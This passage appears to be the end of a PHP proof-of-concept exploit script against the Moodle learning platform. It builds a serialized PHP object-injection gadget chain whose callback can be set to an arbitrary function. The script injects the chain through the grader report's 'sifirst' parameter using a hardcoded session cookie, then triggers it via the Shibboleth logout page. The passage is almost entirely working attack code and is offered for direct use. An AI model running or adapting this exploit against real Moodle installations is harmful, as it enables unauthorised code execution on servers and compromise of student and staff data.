key = new \core_availability\tree(); $lib_fb -> key -> children = new \core\dml\recordset_walk(); $lib_fb -> key -> children -> callback = $function; $lib_fb -> key -> children -> recordset = new question_attempt_iterator(); $lib_fb -> key -> children -> recordset -> quba = new question_usage_by_activity(); $lib_fb -> key -> children -> recordset -> quba -> questionattempts = array(1337=>$param); $lib_fb -> key -> children -> recordset -> slots = array(1337); $lib_fb -> infinite = 1; $arr = array($add_lib, $lib_fb); $value = serialize($arr); // echo "\n============ Payload ===========\n"; // echo base64_encode("Testaaaaa|".$value."Testbeeee|"); echo "\n [*] Inject Payload "; $data = array("id"=>1, "sifirst"=>'Testaaaaa|'.$value.'Testbbbbbb|'); httpPost($url.'/grade/report/grader/index.php',$data, $MoodleSession, 0); echo "\n [*] Trigger Payload "; $data = ' ssss '; httpPost($url.'/auth/shibboleth/logout.php', $data, $MoodleSession, 1); } // Exploit Main $url = $argv[1]; $MoodleSession = 'v8grl591eoi47agqac0ddlsp3v'; $function = "header"; $param = "Hacked: by0d0ff9"; pwn($url, $MoodleSession, $function, $param); } ?>